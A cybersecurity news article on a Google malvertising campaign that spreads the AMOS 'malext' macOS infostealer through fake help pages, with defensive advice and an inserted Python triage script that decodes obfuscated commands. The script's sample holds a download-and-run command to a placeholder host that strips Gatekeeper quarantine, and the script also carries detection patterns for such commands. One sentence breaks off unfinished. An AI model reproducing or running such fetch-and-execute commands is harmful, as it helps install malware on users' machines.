Malvertising Campaign Delivers AMOS ‘malext’ macOS Infostealer via Fake Text‑Sharing Lures

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

A new malvertising campaign is actively targeting macOS users worldwide, delivering a new variant of the AMOS infostealer called “malext.”

Attackers are purchasing Google Search ads that push victims toward fake help articles on free text-sharing websites, where a deceptive terminal command silently installs the stealer on their machines.

The campaign first came to light when a macOS user searching Google for storage cleanup help stumbled upon the top search result — a fake Medium blog post.

The post appeared legitimate and included a ready-to-paste terminal command as part of the “fix.”

The user only grew suspicious when the device started asking for the administrative password in a loop, narrowly escaping a full system compromise. That incident opened the door to a wider investigation.

A computer enthusiast,

Using Google’s Ads Transparency tool, they uncovered more than 34 active attack chains and over 53 hijacked Google Ads accounts being used to push malicious lures.

The scale of the operation suggested involvement from a larger organized criminal group, likely a “Traffer” network.

Beyond Medium, the attackers hosted fake articles on Evernote, mssg.me, and kimi.com — services that require no identity checks to use.

Each time a malicious article was removed, the attackers replaced it immediately, demonstrating a well-maintained and persistent operation.

Google malvertising targeting MacOS users (Source – Medium)

These pages mimic real help guides, directing victims through two steps that end in a harmful terminal command.

Medium.com lure (Source – Medium)

The final payload — “malext” — is a new AMOS (Atomic macOS Stealer) variant, named after the C2 domain malext[.]com hardcoded in the sample.

Once active, it harvests browser credentials, Apple Notes, Safari cookies, crypto wallet data, Telegram sessions, and the macOS keychain.

It then backdoors Ledger and Trezor wallet applications by swapping them with trojanized versions, granting attackers prolonged access to the victim’s finances.

Inside the Kill Chain: Infection and Persistence

The infection starts when a user pastes the terminal command from a lure page.

Command copied from a template website (Source – Medium)

Decoding the base64-encoded command exposes a curl request that fetches a remote script, which is itself wrapped in both Base64 encoding and gzip compression — a rare double-obfuscation technique.

Once fully unpacked, the real command downloads a MachO binary to /tmp, strips macOS’s Gatekeeper quarantine flag using xattr -c, and runs it with no warning shown to the user.
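As an added triage aid (not code from the article or the researchers), the following script peels the base64 and gzip layers described above and flags the behaviours the article attributes to the unpacked command: a curl fetch, a drop into /tmp, an xattr -c quarantine strip, and the LaunchDaemon persistence. The regexes, the sample script and its placeholder URL are assumptions constructed for the example.

```python
import base64
import binascii
import gzip
import re

# Behaviours the article attributes to the unpacked command; regexes are mine.
INDICATORS = {
    "remote_fetch": re.compile(r"\bcurl\b"),
    "tmp_drop": re.compile(r"/tmp/\S+"),
    "quarantine_strip": re.compile(r"\bxattr\s+-c\b"),
    "launchdaemon_persist": re.compile(r"LaunchDaemons|com\.finder\.helper\.plist"),
}
GZIP_MAGIC = b"\x1f\x8b"


def _is_text(raw: bytes) -> bool:
    try:
        s = raw.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(c.isprintable() or c in "\n\r\t" for c in s)


def unwrap_layers(blob: bytes, max_layers: int = 8):
    """Peel alternating base64/gzip layers until plain text remains.
    Returns (text, layers), layers listing each encoding removed, outermost first."""
    layers, data = [], blob
    for _ in range(max_layers):
        if data.startswith(GZIP_MAGIC):
            data = gzip.decompress(data)
            layers.append("gzip")
            continue
        try:
            decoded = base64.b64decode(b"".join(data.split()), validate=True)
        except (binascii.Error, ValueError):
            break  # not base64: this is the plaintext
        # Only accept the layer if it yields gzip or readable text; a short word
        # can look like valid base64 without being an encoding layer.
        if not (decoded.startswith(GZIP_MAGIC) or _is_text(decoded)):
            break
        data = decoded
        layers.append("base64")
    return data.decode("utf-8", errors="replace"), layers


def triage(text: str):
    """Sorted names of the article's indicators present in the decoded command."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


# Constructed sample standing in for the remote script: gzip wrapped in base64.
# The URL and file name are placeholders, not indicators from the campaign.
SAMPLE_SCRIPT = ("curl -fsSL https://lure.example.invalid/stage -o /tmp/stage\n"
                 "xattr -c /tmp/stage\n/tmp/stage\n")
SAMPLE_BLOB = base64.b64encode(gzip.compress(SAMPLE_SCRIPT.encode()))

if __name__ == "__main__":
    text, layers = unwrap_layers(SAMPLE_BLOB)
    print("layers removed:", " -> ".join(layers))
    print("indicators:", triage(text))
```

Feed a blob copied from a lure page into unwrap_layers to see the command before any of it executes; a non-empty triage list is a reason to stop.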

Before running the stealer, the MachO binary — built for both ARM and x86-64 architectures — executes a VM detection check.

This check, obfuscated with a Caesar cipher, queries macOS’s system_profiler for signs of QEMU, VMware, or KVM.

It also looks for hardware indicators typical of sandbox environments, like fake board serial numbers and unusually old processors. This successfully blocked execution across every major macOS sandbox tested, including VirusTotal and Tria.ge.

When no sandbox is detected, the main 59,444-character AppleScript payload runs. It hides the terminal window, collects hardware details, and steals the macOS login password using a fake helper installation dialog if no stored credential is found.

The stealer then sweeps through browser profiles, crypto wallets, the macOS keychain, Telegram sessions, and Apple Notes, compressing all collected data into a zip archive. Exfiltration goes to 38.244.158[.]56, with 199.217.98.33 as a backup.

A LaunchDaemon plist at com.finder.helper.plist installs a persistent backdoor that restarts on every reboot.

macOS users should never paste terminal commands from online articles, no matter how helpful they appear. Keep Gatekeeper and System Integrity Protection always enabled, and approach any Google ad-labeled search result with caution.

If an infection is suspected, immediately remove the files ~/.pass, ~/.agent, ~/.mainhelper and ~/.username, and the LaunchDaemon entry com.finder.helper.plist, change all browser-saved passwords, and reinstall affected cryptocurrency wallet apps from their official source.
